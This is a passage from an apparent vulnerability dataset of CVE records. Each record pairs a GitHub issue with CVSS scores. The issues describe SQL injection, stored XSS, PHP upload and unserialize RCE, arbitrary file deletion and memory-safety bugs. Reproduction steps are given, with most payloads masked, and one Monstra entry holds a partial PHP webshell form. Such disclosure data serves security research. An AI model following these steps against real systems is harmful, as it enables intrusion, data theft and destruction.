        "description": "SQL injection UNION attack with quicksearch parameter in APITAG NUMBERTAG EXPECTED BEHAVIOUR An authenticated malicious user can take advantage of a SQL injection UNION attack vulnerability with quicksearch parameter in URL. IMPACT A successful SQL injection attack may result in the unauthorized viewing of user lists, the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to a database, all of which are highly detrimental to a business. VULNERABILITY CODE I found quicksearch parameter is not handled in SQL query with WHERE clause in PATHTAG FILETAG And the protect function in PATHTAG is not use ESCAPE to filter special characters FILETAG Then it is use to query in: PATHTAG FILETAG STEPS TO REPRODUCE NUMBERTAG We change the request in URL ERRORTAG NUMBERTAG And then we could exploit all the data. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-36461",
        "Issue_Url_old": "https://github.com/microweber/microweber/issues/751",
        "Issue_Url_new": "https://github.com/microweber/microweber/issues/751",
        "Repo_new": "microweber/microweber",
        "Issue_Created_At": "2021-06-26T02:24:23Z",
        "description": "microweber NUMBERTAG has background upload getshell. FILETAG This pdf file describes the vulnerability in detail",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-36513",
        "Issue_Url_old": "https://github.com/signalwire/freeswitch/issues/1245",
        "Issue_Url_new": "https://github.com/signalwire/freeswitch/issues/1245",
        "Repo_new": "signalwire/freeswitch",
        "Issue_Created_At": "2021-06-29T23:15:58Z",
        "description": "Usage of uninitialized value . There are a few uninitialized value use bugs in PATHTAG In function APITAG Array network_ip will be allocated in line NUMBERTAG CODETAG Then, it will be initialized by APITAG NUMBERTAG sofia_glue_get_addr(de >data >e_msg, network_ip, sizeof(network_ip), NULL NUMBERTAG for NUMBERTAG profile >acl_count NUMBERTAG last_acl = profile >acl NUMBERTAG if (!(acl_ok = APITAG last_acl NUMBERTAG break; However, APITAG may return earlier, leading network_ip in an uninitliazed state. Then network_ip will be used in APITAG It may bypass (ACL) security checks due to the uninitialized value of network_ip, leading to privilege escalation. Same in: CODETAG and in function APITAG CODETAG and in function APITAG CODETAG APITAG may return earlier, leading network_ip in an uninitialized state. Then network_ip will be used in function APITAG This function may print out sensitive data network_ip contained from previous stack. Fix: set network_ip NUMBERTAG preventing from uninitlized value use. Thank you for the review, I also report this bug to CVE.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-3652",
        "Issue_Url_old": "https://github.com/389ds/389-ds-base/issues/4817",
        "Issue_Url_new": "https://github.com/389ds/389-ds-base/issues/4817",
        "Repo_new": "389ds/389-ds-base",
        "Issue_Created_At": "2021-06-29T12:56:33Z",
        "description": "CRYPT password hash with asterisk. Issue Description If an entry contains an asterisk as the crypted password hash, binding is possible with any password for this entry APITAG {CRYPT} Package Version and Platform: Platform: APITAG Leap NUMBERTAG Package and version NUMBERTAG ds NUMBERTAG APITAG APITAG Browser firefox Steps to Reproduce Steps to reproduce the behavior NUMBERTAG Create an entry (e.g. a APITAG with the APITAG set to \"{CRYPT} \", e.g. by importing it from an ldif file NUMBERTAG Try to bind with that entry using an arbitrary password (e.g. \"llhh NUMBERTAG Check if the binding was successfull Expected results I would expect to fail the binding with any password because the asterisk is not a vaild character in a crypted password. Screenshots If applicable, add screenshots to help explain your problem. Additional context Problem occured after importing entries from a NIS database. In NIS (and in /etc/shadow), the asterisk is often used for special users like \"nobody\".",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 2.5,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-36530",
        "Issue_Url_old": "https://github.com/miniupnp/ngiflib/issues/19",
        "Issue_Url_new": "https://github.com/miniupnp/ngiflib/issues/19",
        "Repo_new": "miniupnp/ngiflib",
        "Issue_Created_At": "2021-06-30T02:36:51Z",
        "description": "APITAG heap buffer overflow in APITAG at APITAG in NGIFLIB_NO_FILE mode. Similar to NUMBERTAG this Overflow problem is because in NGIFLIB_NO_FILE mode, APITAG copy memory buffer without checking the boundary. Test Environment Ubuntu NUMBERTAG bit ngiflib(master NUMBERTAG fd4) How to trigger NUMBERTAG Compile the program with APITAG in NGIFLIB_NO_FILE mode APITAG NUMBERTAG run the compiled program APITAG POC file URLTAG Details ASAN report ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-36531",
        "Issue_Url_old": "https://github.com/miniupnp/ngiflib/issues/18",
        "Issue_Url_new": "https://github.com/miniupnp/ngiflib/issues/18",
        "Repo_new": "miniupnp/ngiflib",
        "Issue_Created_At": "2021-06-30T02:34:21Z",
        "description": "APITAG heap buffer overflow in APITAG at APITAG in NGIFLIB_NO_FILE mode. This Overflow problem is because in NGIFLIB_NO_FILE mode, APITAG reads memory buffer without checking the boundary. Test Environment Ubuntu NUMBERTAG bit ngiflib(master NUMBERTAG fd4) How to trigger NUMBERTAG Compile the program with APITAG in NGIFLIB_NO_FILE mode APITAG NUMBERTAG run the compiled program APITAG POC file URLTAG Details ASAN report ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-36547",
        "Issue_Url_old": "https://github.com/r0ck3t1973/RCE/issues/1",
        "Issue_Url_new": "https://github.com/r0ck3t1973/rce/issues/1",
        "Repo_new": "r0ck3t1973/rce",
        "Issue_Created_At": "2020-09-01T08:04:38Z",
        "description": "Remote Code Execution via Snippets module in Mara version NUMBERTAG Describe the bug / An attacker could insert any executable code through php via File to execution command in the server / To Reproduce NUMBERTAG Log into the panel NUMBERTAG Click APITAG >> New ( PATHTAG NUMBERTAG Click File Upload NUMBERTAG Insert payload php: FILETAG NUMBERTAG Save and Exit NUMBERTAG Go to PATHTAG / Screenhost NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-36548",
        "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/470",
        "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/470",
        "Repo_new": "monstra-cms/monstra",
        "Issue_Created_At": "2021-07-05T02:51:41Z",
        "description": "RCE APITAG Code Execution via Theme Blog Monstra version NUMBERTAG Describe the bug An attacker could insert any executable code through php via Theme Blog to execution command in the server To Reproduce NUMBERTAG Log into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Click edit Blog NUMBERTAG Insert payload FILETAG APITAG APITAG <form method=\"GET\" name=\"<?php echo basename($_SERVER FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-36550",
        "Issue_Url_old": "https://github.com/r0ck3t1973/xss_payload/issues/6",
        "Issue_Url_new": "https://github.com/r0ck3t1973/xss_payload/issues/6",
        "Repo_new": "r0ck3t1973/xss_payload",
        "Issue_Created_At": "2021-07-07T12:52:26Z",
        "description": "Bypass Cross Site Script Vulnerability on APITAG in APITAG version NUMBERTAG Hi, I found stored xss in Categories. To Reproduce NUMBERTAG Login into the panel NUMBERTAG Go to Documents: 'tiki NUMBERTAG tiki APITAG NUMBERTAG Click Categories: PATHTAG NUMBERTAG Create category NUMBERTAG insert payload bypass xss: APITAG APITAG APITAG NUMBERTAG Click Categories >> Click2 >> Boom alert message xss! Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. POC FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-36551",
        "Issue_Url_old": "https://github.com/r0ck3t1973/xss_payload/issues/7",
        "Issue_Url_new": "https://github.com/r0ck3t1973/xss_payload/issues/7",
        "Repo_new": "r0ck3t1973/xss_payload",
        "Issue_Created_At": "2021-07-07T12:53:38Z",
        "description": "Bypass Cross Site Script Vulnerability on APITAG in APITAG version NUMBERTAG Hi Team, I found stored xss in Calendar To Reproduce NUMBERTAG Login into panel NUMBERTAG Go to Documents: PATHTAG NUMBERTAG Click Calendar: PATHTAG NUMBERTAG Click Add Event NUMBERTAG insert payload bypass xss in Description APITAG NUMBERTAG Click Details Event >> APITAG Boom alert message xss! Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. POC FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-36564",
        "Issue_Url_old": "https://github.com/top-think/framework/issues/2559",
        "Issue_Url_new": "https://github.com/top-think/framework/issues/2559",
        "Repo_new": "top-think/framework",
        "Issue_Created_At": "2021-07-02T13:21:46Z",
        "description": "APITAG exists unserialize vulnerability . thinkphp NUMBERTAG has a unserialize vulnerability Vulnerability Demo Create Routing at APITAG ERRORTAG this is my poc ERRORTAG The file has been generated in the directory in public Vulnerability Analysis First one starts with __destruct, autosave can be bypassed by assigning a value of true FILETAG finally at APITAG FILETAG And this one happens to have the file_put_contents method in it FILETAG The parameters are all controllable, but we need to bypass the APITAG method, otherwise if we pass in escape symbols it will also output APITAG Here I pass in APITAG will be commented out in front and followed by APITAG is separated, causing the vulnerability, analysis is complete",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-36567",
        "Issue_Url_old": "https://github.com/top-think/framework/issues/2561",
        "Issue_Url_new": "https://github.com/top-think/framework/issues/2561",
        "Repo_new": "top-think/framework",
        "Issue_Created_At": "2021-07-02T13:42:08Z",
        "description": "PHP unserialize vulnerability in NUMBERTAG PHP unserialize vulnerability in NUMBERTAG ulnerability Demo This chain does not show back on the web page, but can execute system commands, and the public chain is a little different from the Internet First, simply write a route ERRORTAG exp ERRORTAG Attempt to write file successful FILETAG Ant sword connection successful FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-36584",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1842",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1842",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-07-06T02:59:40Z",
        "description": "heap buffer overflow in gp_rtp_builder_do_t NUMBERTAG g. Hello, A heap buffer overflow has occurred when running program APITAG can reproduce on the lattest commit. System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG FILETAG Verification steps\uff1a APITAG the source code of gpac APITAG APITAG NUMBERTAG run APITAG APITAG asan info ERRORTAG source code ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-3660",
        "Issue_Url_old": "https://github.com/cockpit-project/cockpit/issues/16122",
        "Issue_Url_new": "https://github.com/cockpit-project/cockpit/issues/16122",
        "Repo_new": "cockpit-project/cockpit",
        "Issue_Created_At": "2021-07-20T13:49:33Z",
        "description": "Is cockpit vulnerable to clickjacking?. Through a security scan, I was notified: > APITAG remote web server does not set an X Frame Options response header or a Content Security Policy 'frame ancestors' response header in all content responses. This could potentially expose the site to a clickjacking or UI redress attack, in which an attacker can trick a user into clicking an area of the vulnerable page that is different than what the user perceives the page to be. This can result in a user performing fraudulent or malicious transactions._ Suggested solution is: > Return the X Frame Options or Content Security Policy (with the 'frame ancestors' directive) HTTP header with the page's response. Is there a way to do this through the config in cockpit? or is there some other reason it is not subject to clickjacking? Thank you",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-36605",
        "Issue_Url_old": "https://github.com/3xxx/engineercms/issues/52",
        "Issue_Url_new": "https://github.com/3xxx/engineercms/issues/52",
        "Repo_new": "3xxx/engineercms",
        "Issue_Created_At": "2021-07-06T14:16:22Z",
        "description": "APITAG has a stored XSS vulnerability. Description There is no escaping in the nickname field on the user list APITAG viewing this page, the APITAG code will be executed in the user's browser. Impact Version NUMBERTAG Steps to Reproduce APITAG the profile page after logging in\uff0c APITAG APITAG on the nickname and insert the javascript code\uff0c ERRORTAG APITAG save, the payload has been executed FILETAG The original request is as follows\uff1a ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-3664",
        "Issue_Url_old": "https://github.com/unshiftio/url-parse/issues/205",
        "Issue_Url_new": "https://github.com/unshiftio/url-parse/issues/205",
        "Repo_new": "unshiftio/url-parse",
        "Issue_Created_At": "2021-05-25T16:12:20Z",
        "description": "URLs with no hostname not parsed properly in NUMBERTAG Hi there, I'm using this library to parse URLs with a custom protocol like so: APITAG The behaviour has changed in NUMBERTAG so that part of the pathname is being treated as the host. I believe this is a bug and goes against the browser implementation of URL , which produces a similar output similar to NUMBERTAG with the hostname unset. I think it's due to the change in regex match here URLTAG . Output in NUMBERTAG CODETAG Output in NUMBERTAG CODETAG Let me know if you need any more details. Thanks!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-3664",
        "Issue_Url_old": "https://github.com/unshiftio/url-parse/issues/206",
        "Issue_Url_new": "https://github.com/unshiftio/url-parse/issues/206",
        "Repo_new": "unshiftio/url-parse",
        "Issue_Created_At": "2021-07-22T14:24:06Z",
        "description": "Security issues Hostname spoofing & Open Redirect. MENTIONTAG MENTIONTAG I have reported a security issue in huntr URLTAG There are NUMBERTAG attack scenarios possible for Open Redirect and Hostname APITAG take a look at the last comment) Please validate and let us know your opinion on this. Thank you.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-36654",
        "Issue_Url_old": "https://github.com/boiteasite/cmsuno/issues/17",
        "Issue_Url_new": "https://github.com/boiteasite/cmsuno/issues/17",
        "Repo_new": "boiteasite/cmsuno",
        "Issue_Created_At": "2021-07-09T00:02:59Z",
        "description": "APITAG NUMBERTAG stored XSS. Hi :) cmsuno version NUMBERTAG is vulnerable to a stored cross site scripting. An authenticated attacker can inject a payload while updating the template's image filename after intercepting the request using Burpsuite via the tgo parameter. After successful update of the template, the xss is poped up in the website page. Steps to reproduce NUMBERTAG Go to FILETAG and click on plugins NUMBERTAG Click on Logo FILETAG NUMBERTAG Choose a random picture in your files repository, click on save and intercept the request using APITAG NUMBERTAG Change the tgo parameter value with the following FILETAG NUMBERTAG Forward the request and click on publish FILETAG NUMBERTAG Click on See the website FILETAG NUMBERTAG SS FILETAG FILETAG Thanks",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-36691",
        "Issue_Url_old": "https://github.com/libjxl/libjxl/issues/422",
        "Issue_Url_new": "https://github.com/libjxl/libjxl/issues/422",
        "Repo_new": "libjxl/libjxl",
        "Issue_Created_At": "2021-08-08T09:14:24Z",
        "description": "Assertion failed in PATHTAG APITAG Describe the bug Assertion failed when compressing a gif with cjxl. CODETAG To Reproduce Steps to reproduce the behavior: CODETAG FILETAG Expected behavior No assertion failed. Environment OS: APITAG Compiler version: APITAG CPU type NUMBERTAG cjxl/djxl version string: cjxl NUMBERTAG f3e APITAG Additional context It seems that the memory allocation size is too large causing the assertion failed. URLTAG Some gdb information ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-36692",
        "Issue_Url_old": "https://github.com/libjxl/libjxl/issues/308",
        "Issue_Url_new": "https://github.com/libjxl/libjxl/issues/308",
        "Repo_new": "libjxl/libjxl",
        "Issue_Created_At": "2021-07-09T12:29:54Z",
        "description": "A stack use after scope issue with cjxl encode routine. Describe the bug A stack use after scope issue was discovered in cjxl encode routine when building with ASAN. To Reproduce Steps to reproduce the behavior: CODETAG The crash file FILETAG . Expected behavior cjxl should encode the PNG to JXL successfully. Environment OS NUMBERTAG generic NUMBERTAG Ubuntu Compiler version: clang version NUMBERTAG CPU type NUMBERTAG cjxl/djxl version string: cjxl NUMBERTAG APITAG Additional context ERRORTAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-36701",
        "Issue_Url_old": "https://github.com/danpros/htmly/issues/481",
        "Issue_Url_new": "https://github.com/danpros/htmly/issues/481",
        "Repo_new": "danpros/htmly",
        "Issue_Created_At": "2021-07-11T05:35:39Z",
        "description": "Arbitrary file deletion and Persistent XSS exists on htmly NUMBERTAG An Arbitrary file deletion vulnerability in the backend In PATHTAG line NUMBERTAG ERRORTAG When we delete our backup files, we can delete any files on the system through directory traversal. APITAG example: When we login, we can go to setting > backup > Creat back, then we client delete, we can get a link. when we modify the file field to APITAG and submit. CODETAG The administrator information has been deleted and no one can login to the system NUMBERTAG Persistent XSS on Blog title Since the Blog title is not processed by htmlentities APITAG when we modify the Blog title to APITAG , Javascript is executed. APITAG APITAG NUMBERTAG Persistent XSS on Creating regular blog post. When we Creating regular blog post. Enter in Content APITAG and visit this article, Javascript is executed. APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-36797",
        "Issue_Url_old": "https://github.com/victronenergy/venus/issues/836",
        "Issue_Url_new": "https://github.com/victronenergy/venus/issues/836",
        "Repo_new": "victronenergy/venus",
        "Issue_Created_At": "2021-07-13T18:59:06Z",
        "description": "APITAG Root login by default. I am using APITAG on a Raspberry Pi for testing purposes and it seems that the default account setup is against security best practices: Root login should be disabled with all access which requires root done through sudo A standard user should be configured for normal access (e.g. pi ) A default password may be provided but it should be forcibly changed on first login Auto login should be disabled by default The documentation should recommend changing the password As it is at the moment, there are likely many devices running APITAG with unsecured root privileges available by default. It would also be beneficial to add a security policy to this repo so that vulnerabilities such as this can be highlighted in private while they are addressed: URLTAG",
        "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.8,
        "impactScore": 5.9,
        "exploitabilityScore": 0.9
    },
    {
        "CVE_ID": "CVE-2021-3681",
        "Issue_Url_old": "https://github.com/ansible/galaxy/issues/1977",
        "Issue_Url_new": "https://github.com/ansible/galaxy/issues/1977",
        "Repo_new": "ansible/galaxy",
        "Issue_Created_At": "2019-08-07T14:36:37Z",
        "description": "Galaxy admin can't deprecated collections. Galaxy admin should be able to deprecate other account's collections.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-36977",
        "Issue_Url_old": "https://github.com/HDFGroup/hdf5/issues/272",
        "Issue_Url_new": "https://github.com/hdfgroup/hdf5/issues/272",
        "Repo_new": "hdfgroup/hdf5",
        "Issue_Created_At": "2021-01-19T20:42:49Z",
        "description": "Delegating open fuzzing issues of libmatio to hdf5. OSS library matio URLTAG is being continuously fuzzed by the oss fuzz URLTAG service. Most of the open matio fuzzing issues CVETAG seem to be related to the hdf NUMBERTAG library dependency which is is not being fuzzed by oss fuzz. Whom can I add as contact person for these issues? I believe the mail address needs to be setup as Google account in order to get access? See also URLTAG where I first raised this topic. FYI APITAG chromium",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-36977",
        "Issue_Url_old": "https://github.com/google/oss-fuzz/issues/4999",
        "Issue_Url_new": "https://github.com/google/oss-fuzz/issues/4999",
        "Repo_new": "google/oss-fuzz",
        "Issue_Created_At": "2021-01-18T20:18:24Z",
        "description": "What to do if issue is raised in dependent library?. Most of the open matio fuzzing issues CVETAG seem to be related to the hdf NUMBERTAG library dependency which is is not being fuzzed by oss fuzz. What can I do to get these open issues properly addressed. Can I reassign them to the HDF5 developers URLTAG ? Can we add secondary contact to the APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-37144",
        "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/32",
        "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/32",
        "Repo_new": "cskaza/cszcms",
        "Issue_Created_At": "2021-07-20T20:33:42Z",
        "description": "Bug Report: Multiple Arbitrary File Deletion vulnerability. Vulnerability Name: Multiple Arbitrary File Deletion Date of Discovery NUMBERTAG July NUMBERTAG Product version NUMBERTAG Download link URLTAG Author: faisalfs NUMBERTAG ulnerability Description: When unsanitized user input is supplied to a file deletion function, an arbitrary file deletion vulnerability arises. This occurs in PHP when the APITAG function is called and user input might affect portions of or the whole affected parameter, which represents the path of the file to remove, without sufficient sanitization. Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker can leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints. Proof of Concept NUMBERTAG ulnerable URL: URLTAG Vulnerable Code: line NUMBERTAG PATHTAG FILETAG Steps to Reproduce NUMBERTAG Login as admin NUMBERTAG Goto Plugin Manager > Article > edit any article NUMBERTAG Upload any image as APITAG Picture\" and APITAG Upload\" and click save button NUMBERTAG Click APITAG File\" button for both APITAG Picture\" and APITAG Upload\" and click save button NUMBERTAG Intercept the request and replace existing image to any files on the server via parameter \"del_file\" and \"del_file2\" FILETAG Proof of Concept NUMBERTAG ulnerable URL: URLTAG Vulnerable Code: line NUMBERTAG PATHTAG FILETAG Step to Reproduce NUMBERTAG Login as admin NUMBERTAG Goto General Menu > Site Setting NUMBERTAG Upload any image as APITAG Logo\" and APITAG of og metatag\" and click save button NUMBERTAG Click APITAG File\" button for both APITAG Logo\" and APITAG of og metatag\" and click save button NUMBERTAG Intercept the request and replace existing image to any files on the server via parameter \"del_file\" and \"del_og_image\" FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-37231",
        "Issue_Url_old": "https://github.com/wez/atomicparsley/issues/30",
        "Issue_Url_new": "https://github.com/wez/atomicparsley/issues/30",
        "Repo_new": "wez/atomicparsley",
        "Issue_Created_At": "2021-07-09T10:40:38Z",
        "description": "A stack buffer overflow occurs while parsing a file. S ystem Configuration APITAG version: atomicparsley APITAG ERRORTAG NUMBERTAG f Used arguments: T NUMBERTAG t + Environment APITAG system, version and so on): Ubuntu NUMBERTAG bit Additional information: compilation with asan NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG fffffffd NUMBERTAG at pc NUMBERTAG ffff NUMBERTAG e NUMBERTAG d bp NUMBERTAG fffffffd NUMBERTAG sp NUMBERTAG fffffffcce8 WRITE of size NUMBERTAG at NUMBERTAG fffffffd NUMBERTAG thread T0 Program received signal SIGSEGV, Segmentation fault NUMBERTAG ffff6ffcc NUMBERTAG in ?? () from PATHTAG NUMBERTAG ffff6ffe NUMBERTAG b in APITAG () from PATHTAG NUMBERTAG ffff NUMBERTAG b4a NUMBERTAG in ?? () from PATHTAG NUMBERTAG ffff NUMBERTAG af7f7 in ?? () from PATHTAG NUMBERTAG ffff NUMBERTAG ed in ?? () from PATHTAG NUMBERTAG ffff NUMBERTAG in ?? () from PATHTAG NUMBERTAG ffff NUMBERTAG e NUMBERTAG af in ?? () from PATHTAG NUMBERTAG fd NUMBERTAG in fread (__stream NUMBERTAG n NUMBERTAG c, __size NUMBERTAG ptr NUMBERTAG fffffffd6cd) at PATHTAG NUMBERTAG APITAG (buffer NUMBERTAG fffffffd6cd \"\", APITAG pos=<optimized out>, length NUMBERTAG c) at PATHTAG ERRORTAG PATHTAG NUMBERTAG a NUMBERTAG d0 in APITAG APITAG \"\", APITAG APITAG APITAG at PATHTAG ERRORTAG PATHTAG NUMBERTAG a NUMBERTAG b in APITAG (isofile=<optimized out>, optional_output=<optimized out>) at PATHTAG ERRORTAG PATHTAG I've attached the file. Please download and check the file. FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-37232",
        "Issue_Url_old": "https://github.com/wez/atomicparsley/issues/32",
        "Issue_Url_new": "https://github.com/wez/atomicparsley/issues/32",
        "Repo_new": "wez/atomicparsley",
        "Issue_Created_At": "2021-07-13T05:27:45Z",
        "description": "A stack buffer overflow occurs while parsing movie details. System Configuration APITAG version: atomicparsley APITAG Used arguments: T NUMBERTAG t + Environment APITAG system, version and so on): Ubuntu NUMBERTAG bit Additional information: compilation with asan Description Buffer overflow occurs while NUMBERTAG bit APITAG NUMBERTAG line) because the size of the APITAG NUMBERTAG line) is small NUMBERTAG bytes NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG fffffffd8c5 at pc NUMBERTAG ffff NUMBERTAG e NUMBERTAG d bp NUMBERTAG fffffffd5d0 sp NUMBERTAG fffffffcd NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG fffffffd8c5 thread T NUMBERTAG ffff NUMBERTAG e NUMBERTAG c ( PATHTAG NUMBERTAG fd NUMBERTAG in fread PATHTAG NUMBERTAG fd NUMBERTAG in APITAG , _IO_FILE , unsigned long) PATHTAG NUMBERTAG a NUMBERTAG a0 in APITAG , _IO_FILE , Trackage , APITAG ) PATHTAG NUMBERTAG a NUMBERTAG in APITAG , unsigned char) PATHTAG NUMBERTAG c NUMBERTAG e7 in real_main(int, char ) PATHTAG NUMBERTAG ffff NUMBERTAG b2 in __libc_start_main ( PATHTAG NUMBERTAG d in _start ( PATHTAG ) Address NUMBERTAG fffffffd8c5 is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG a NUMBERTAG df in APITAG , unsigned char) PATHTAG This frame has NUMBERTAG object(s): FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
